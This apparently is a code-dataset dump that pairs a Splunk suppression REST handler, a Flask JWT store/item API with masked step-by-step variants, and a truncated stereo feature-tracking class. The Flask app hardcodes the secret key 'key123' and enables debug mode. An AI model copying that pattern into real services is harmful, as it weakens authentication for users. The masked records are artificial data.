created'}\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The configuration for the new suppression '%s' is invalid and could not be created: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info('Successfully added suppression: %s', name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = (NotableEventSuppression.\n disable_expired_suppressions(session_key=self.getSessionKey()))\n logger.info(\n '%s expired suppressions detected; %s were enabled (now disabled)'\n , expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo):\n \"\"\"\n Handles listing of a suppression\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n suppressionDict = self.readConfCtx('eventtypes')\n if suppressionDict != None:\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(\n stanza)\n if stanzaMatch:\n try:\n Suppressions.checkConf(settings, stanza, confInfo)\n except InvalidConfigException as e:\n logger.error(\n \"The configuration for suppression '%s' is invalid: %s\"\n , stanza, str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n logger.info(\n 'Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes',\n sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn(\n 'Could not refresh suppression configurations via properties endpoint: %s'\n , str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs\n if name is not None:\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention'\n )\n try:\n conf = entity.getEntity('saved/eventtypes', name,\n sessionKey=self.getSessionKey())\n except ResourceNotFound:\n raise admin.NotFoundException(\n \"A suppression configuration with the given name '%s' could not be found\"\n % name)\n else:\n raise admin.ArgValidationException('No name provided')\n log_data = {'status': 'success', 'action': 'edit', 'signature':\n 'Notable event suppression successfully saved', 'suppression':\n name[len(NotableEventSuppression.SUPPRESSION_START):], 'user':\n conf['eai:userName']}\n for key, val in conf.items():\n if key in args.data:\n new_value = args[key][0]\n if new_value in [None, '']:\n new_value = ' '\n if key == self.PARAM_DISABLED:\n conf_key = util.normalizeBoolean(conf[key],\n enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value,\n enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'\n ] = 'disable' if new_value else 'enable'\n log_data['signature'] = (\n 'Suppression successfully disabled' if\n new_value else 'Suppression successfully enabled')\n conf[key] = new_value\n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'\n ] = 'Error occurred while enabling the suppression: ' + str(\n e)\n else:\n log_data['signature'\n ] = 'Error occurred while disabling the suppression: ' + str(\n e)\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info(\"Successfully updated the '%s' suppression\", name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleRemove(self, confInfo):\n owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id,\n namespace=self.appName, owner=owner, sessionKey=self.\n getSessionKey())\n\n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None,\n throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\"\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n if stanza is not None and confInfo is not None:\n for key, val in settings.items():\n if val is None:\n val = ''\n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n else:\n pass\n logger.info(\"Checking general settings for the '%s' suppression\",\n stanza)\n for key, val in settings.items():\n if val is None:\n val = ''\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n except ValueError:\n raise InvalidParameterValueException(key, val,\n 'must be a valid boolean')\n elif key in Suppressions.REQUIRED_PARAMS:\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n elif key in Suppressions.VALID_PARAMS:\n pass\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n elif throwExceptionOnError:\n raise UnsupportedParameterException()\n else:\n logger.warn(\n \"The configuration for '%s' contains an unsupported parameter: %s\"\n , stanza, key)\n if len(required_fields) > 0:\n raise InvalidConfigException(\n 'The following fields must be defined in the configuration but were not: '\n + ', '.join(required_fields).strip())\n\n\nadmin.init(Suppressions, admin.CONTEXT_APP_AND_USER)\n",
"step-5": "\"\"\"\nCopyright (C) 2005 - 2016 Splunk Inc. All Rights Reserved.\n\"\"\"\nimport logging\nimport sys\n\nif sys.platform == \"win32\":\n import os, msvcrt\n msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)\n msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)\n msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)\n\nimport splunk.admin as admin\nimport splunk.entity as entity\nimport splunk.util as util\n\nfrom notable_event_suppression import NotableEventSuppression\nfrom splunk import ResourceNotFound\nfrom splunk.clilib.bundle_paths import make_splunkhome_path\nsys.path.append(make_splunkhome_path([\"etc\", \"apps\", \"SA-Utils\", \"lib\"]))\nfrom SolnCommon.log import setup_logger, SHORT_FORMAT\n\nlogger = setup_logger('suppressions_rest_handler', format=SHORT_FORMAT)\nlogger.setLevel(logging.INFO)\n\n\nclass InvalidConfigException(Exception):\n pass\n\n\nclass InvalidParameterValueException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that has an invalid value.\n \"\"\"\n \n def __init__(self, field, value, value_must_be):\n message = \"The value for the parameter '%s' is invalid: %s (was %s)\" % (field, value_must_be, value)\n super(InvalidConfigException, self).__init__(message)\n \n \nclass UnsupportedParameterException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that is unsupported.\n \"\"\"\n pass\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\"Missing transition detected\")\n \n \ndef _getFieldValue(args, name, default_value=None, max_length=None):\n '''Get the field value from the argument list.'''\n \n # Get the value if defined or the default value if not defined\n value = args[name][0] or default_value if name in args else default_value\n \n # Check the length\n if value and max_length and len(value) > max_length:\n raise admin.ArgValidationException(\n 'App %s cannot be longer than %s character%s.' % (name, max_length, \"s\" if max_length > 1 else \"\"))\n return value\n \n\ndef _addToDictIfNonNull(d, name, value):\n '''Add the given name and value to the dictionary if the value is not none.\n \n Arguments:\n d -- the dictionary to add to\n name -- the name of the object to add\n value -- the value of the object to add (if not none)\n '''\n if value is not None:\n d[name] = value\n\n \nclass Suppressions(admin.MConfigHandler):\n '''\n Set up supported arguments\n '''\n # admin.py constants\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4': 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32': 'ACTION_RELOAD'}\n\n # Permissions\n WRITE_CAPABILITY = 'edit_suppressions'\n\n # Default Params\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n \n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n \n # Configuration key mapping\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n \n # Default Vals\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n\n DEFAULT_DISABLED = 0\n \n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n \n # set write capability\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY) \n \n if self.requestedAction == admin.ACTION_EDIT or self.requestedAction == admin.ACTION_CREATE: \n # Fill required params\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n \n # Fill valid params\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n \n def handleCreate(self, confInfo):\n '''Handles creation of a suppression.'''\n \n # Get requested action\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n \n logger.info('Entering %s', actionStr)\n \n # Refresh\n self.handleReload()\n \n name = self.callerArgs.id\n args = self.callerArgs.data\n \n # Make sure the name is not empty\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\"The name of the suppression must not be empty\")\n \n # Make sure the name follows the convention\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n \n if not nameMatch:\n raise admin.ArgValidationException(\"The name of the suppression must follow proper convention\")\n \n # Make sure the item does not already exist\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\"A suppression entry already exists for %s\" % (name))\n \n # Get the field values\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n \n # Add the field values to a configuration dictionary (that will be verified)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self.getSessionKey())\n \n conf.namespace = self.appName # always save things to SOME app context.\n conf.owner = self.context == admin.CONTEXT_APP_AND_USER and self.userName or \"-\"\n \n conf['name'] = name\n \n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n \n ## Notable Suppression Audit Log Data\n log_data = {\n 'action': 'create',\n 'suppression': conf['name'][len(NotableEventSuppression.SUPPRESSION_START):],\n 'user': conf['eai:acl']['owner'],\n 'status': 'success',\n 'signature': 'Notable event suppression successfully created'\n }\n \n # Check the configuration\n try:\n Suppressions.checkConf(conf, name)\n \n except InvalidConfigException as e:\n e = \"The configuration for the new suppression '%s' is invalid and could not be created: %s\" % (name, str(e))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))\n raise admin.ArgValidationException(e)\n \n # Write out an update to the eventtypes config file\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n \n logger.info('Successfully added suppression: %s', name)\n \n # Reload suppressions\n self.handleReload()\n \n logger.info('%s completed successfully', actionStr)\n logger.info('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = NotableEventSuppression.disable_expired_suppressions(session_key=self.getSessionKey())\n logger.info(\"%s expired suppressions detected; %s were enabled (now disabled)\", expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo): \n \"\"\"\n Handles listing of a suppression\n \"\"\"\n # Get requested action\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n \n logger.info('Entering %s', actionStr)\n \n self.handleReload()\n \n # Get the configurations from suppression.conf\n suppressionDict = self.readConfCtx('eventtypes')\n \n # Get all suppressions and provide the relevant options\n if suppressionDict != None:\n # Check each conf\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(stanza)\n \n if stanzaMatch:\n try:\n # Check config\n Suppressions.checkConf(settings, stanza, confInfo)\n \n except InvalidConfigException as e:\n logger.error(\"The configuration for suppression '%s' is invalid: %s\", stanza, str(e))\n \n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n # Get requested action\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n \n logger.info('Entering %s', actionStr)\n \n logger.info('Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes', sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn('Could not refresh suppression configurations via properties endpoint: %s', str(e))\n \n logger.info('%s completed successfully', actionStr)\n \n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n \n # Get requested action\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n \n logger.info('Entering %s', actionStr)\n \n # Refresh\n self.handleReload()\n \n name = self.callerArgs.id\n args = self.callerArgs\n \n if name is not None:\n # Make sure the name follows the convention\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n \n if not nameMatch:\n raise admin.ArgValidationException(\"The name of the suppression must follow proper convention\")\n \n try:\n conf = entity.getEntity('saved/eventtypes', name, sessionKey=self.getSessionKey())\n \n except ResourceNotFound:\n raise admin.NotFoundException(\"A suppression configuration with the given name '%s' could not be found\" % (name))\n \n else:\n # Stop if no name was provided\n raise admin.ArgValidationException(\"No name provided\")\n \n ## Notable Suppression Audit Log Data\n log_data = {\n 'status': 'success',\n 'action': 'edit',\n 'signature': 'Notable event suppression successfully saved',\n 'suppression': name[len(NotableEventSuppression.SUPPRESSION_START):],\n 'user': conf['eai:userName']\n }\n \n # Create the resulting configuration that would be persisted if the settings provided are applied\n for key, val in conf.items():\n if key in args.data:\n \n # Set the value to a single space so that the field is set to a blank value\n new_value = args[key][0]\n \n if new_value in [None, '']:\n new_value = ' '\n \n ## If a value other than the 'disabled' param is changed, it \n # came from the editor, otherwise the lister. \n if key == self.PARAM_DISABLED:\n conf_key = util.normalizeBoolean(conf[key], enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value, enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'] = 'disable' if new_value else 'enable'\n log_data['signature'] = 'Suppression successfully disabled' if new_value else 'Suppression successfully enabled'\n \n conf[key] = new_value\n \n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n \n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n \n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n \n try:\n # Check config\n Suppressions.checkConf(conf, name)\n \n except InvalidConfigException as e:\n e = \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\" % (name, str(e))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'] = 'Error occurred while enabling the suppression: ' + str(e)\n else:\n log_data['signature'] = 'Error occurred while disabling the suppression: ' + str(e)\n \n logger.error('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))\n raise admin.ArgValidationException(e)\n \n # Write out an update to the eventtypes config file\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n \n # Log that the suppression was updated\n logger.info(\"Successfully updated the '%s' suppression\", name)\n \n # Reload suppressions\n self.handleReload()\n \n logger.info('%s completed successfully', actionStr)\n \n logger.info('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))\n \n def handleRemove(self, confInfo):\n owner = ((self.context == admin.CONTEXT_APP_AND_USER) and self.userName) or \"-\"\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id, namespace=self.appName, owner=owner, sessionKey=self.getSessionKey())\n \n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None, throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\" \n # Below is a list of the required fields. The entries in this list will be removed as they\n # are observed. An empty list at the end of the config check indicates that all necessary\n # fields where provided.\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n \n if stanza is not None and confInfo is not None:\n # Add each of the settings\n for key, val in settings.items():\n # Set val to empty if None\n if val is None:\n val = ''\n \n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n \n # Key is eai; Set meta \n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n \n # Key is eai; userName/appName\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n \n # Key is not proper\n else:\n pass\n \n # Check each of the settings individually\n logger.info(\"Checking general settings for the '%s' suppression\", stanza)\n for key, val in settings.items():\n # Set val to empty if None\n if val is None:\n val = ''\n \n # Check the disabled/selected value\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n \n # Remove the field from the list of required fields\n try:\n required_fields.remove(key)\n \n except ValueError:\n pass # Field not available, probably because it is not required\n \n except ValueError:\n raise InvalidParameterValueException(key, val, \"must be a valid boolean\")\n \n elif key in Suppressions.REQUIRED_PARAMS:\n # Remove the field from the list of required fields\n try:\n required_fields.remove(key)\n \n except ValueError:\n pass # Field not available, probably because it is not required\n \n elif key in Suppressions.VALID_PARAMS:\n pass\n \n # Key is eai\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n \n # Key is not proper\n else:\n if throwExceptionOnError:\n raise UnsupportedParameterException()\n \n else:\n logger.warn(\"The configuration for '%s' contains an unsupported parameter: %s\", stanza, key)\n\n # Error if some of the required fields were not provided\n if len(required_fields) > 0:\n raise InvalidConfigException('The following fields must be defined in the configuration but were not: ' + ', '.join(required_fields).strip())\n\n \n# initialize the handler\nadmin.init(Suppressions, admin.CONTEXT_APP_AND_USER)",
"step-ids": [
14,
16,
18,
23,
26
]
}
|
[
14,
16,
18,
23,
26
] |
# create item based on name using post method, get specific item or list of items using get method, update item using put and delete item using del method.
import os
from flask import Flask
from flask_restful import Api
from flask_jwt import JWT, timedelta
from security import authenticate, identity
from resources.user import UserRegister
from resources.item import Item,ItemList
from resources.store import Store, StoreList
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', 'sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # turn off flask SQLAlchemy modification.
app.secret_key = 'key123'
api = Api(app)
jwt = JWT(app, authenticate, identity)
api.add_resource(Store,'/store/<string:name>')
api.add_resource(Item,'/item/<string:name>') # http://localhost:5000/student/Rolf
api.add_resource(ItemList,'/items')
api.add_resource(StoreList,'/stores')
api.add_resource(UserRegister, '/register')
if __name__ == '__main__':
from db import db
db.init_app(app)
app.run(debug=True)
|
normal
|
{
"blob_id": "7525691ece4fe66bb175e470db3ac78f701e3730",
"index": 199,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(StoreList, '/stores')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',\n 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'key123'\napi = Api(app)\njwt = JWT(app, authenticate, identity)\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(StoreList, '/stores')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(debug=True)\n",
"step-4": "import os\nfrom flask import Flask\nfrom flask_restful import Api\nfrom flask_jwt import JWT, timedelta\nfrom security import authenticate, identity\nfrom resources.user import UserRegister\nfrom resources.item import Item, ItemList\nfrom resources.store import Store, StoreList\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',\n 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'key123'\napi = Api(app)\njwt = JWT(app, authenticate, identity)\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(StoreList, '/stores')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(debug=True)\n",
"step-5": "# create item based on name using post method, get specific item or list of items using get method, update item using put and delete item using del method.\nimport os\n\nfrom flask import Flask\nfrom flask_restful import Api\nfrom flask_jwt import JWT, timedelta\n\nfrom security import authenticate, identity\nfrom resources.user import UserRegister\nfrom resources.item import Item,ItemList\nfrom resources.store import Store, StoreList\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # turn off flask SQLAlchemy modification.\napp.secret_key = 'key123'\napi = Api(app)\n\njwt = JWT(app, authenticate, identity)\n\napi.add_resource(Store,'/store/<string:name>')\napi.add_resource(Item,'/item/<string:name>') # http://localhost:5000/student/Rolf\napi.add_resource(ItemList,'/items')\napi.add_resource(StoreList,'/stores')\napi.add_resource(UserRegister, '/register')\n\n\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(debug=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class ImageProcessor(object):
<|reserved_special_token_0|>
def __init__(self, config):
self.config = config
self.is_first_img = True
self.next_feature_id = 0
self.detector = cv2.FastFeatureDetector_create(self.config.
fast_threshold)
self.imu_msg_buffer = []
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
self.curr_cam1_pyramid = None
self.prev_features = [[] for _ in range(self.config.grid_num)]
self.curr_features = [[] for _ in range(self.config.grid_num)]
self.num_features = defaultdict(int)
self.cam0_resolution = config.cam0_resolution
self.cam0_intrinsics = config.cam0_intrinsics
self.cam0_distortion_model = config.cam0_distortion_model
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs
self.cam1_resolution = config.cam1_resolution
self.cam1_intrinsics = config.cam1_intrinsics
self.cam1_distortion_model = config.cam1_distortion_model
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
self.create_image_pyramids()
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
elif not self.config.load_features_flag:
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
t = time.time()
print('___draw_features_stereo:', time.time() - t)
t = time.time()
print('===image process elapsed:', time.time() - start,
f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
(Seems doesn't work in python)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
Initialize the image processing sequence, which is basically detect
new features on the first set of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
new_features = self.detector.detect(img)
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def track_features(self):
"""
Tracker features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
self.num_features['before_tracking'] = len(prev_cam0_points)
if len(prev_cam0_points) == 0:
return
curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,
cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.
prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.
astype(np.float32), curr_cam0_points.astype(np.float32), **self
.config.lk_params)
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
track_inliers[i] = 0
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points,
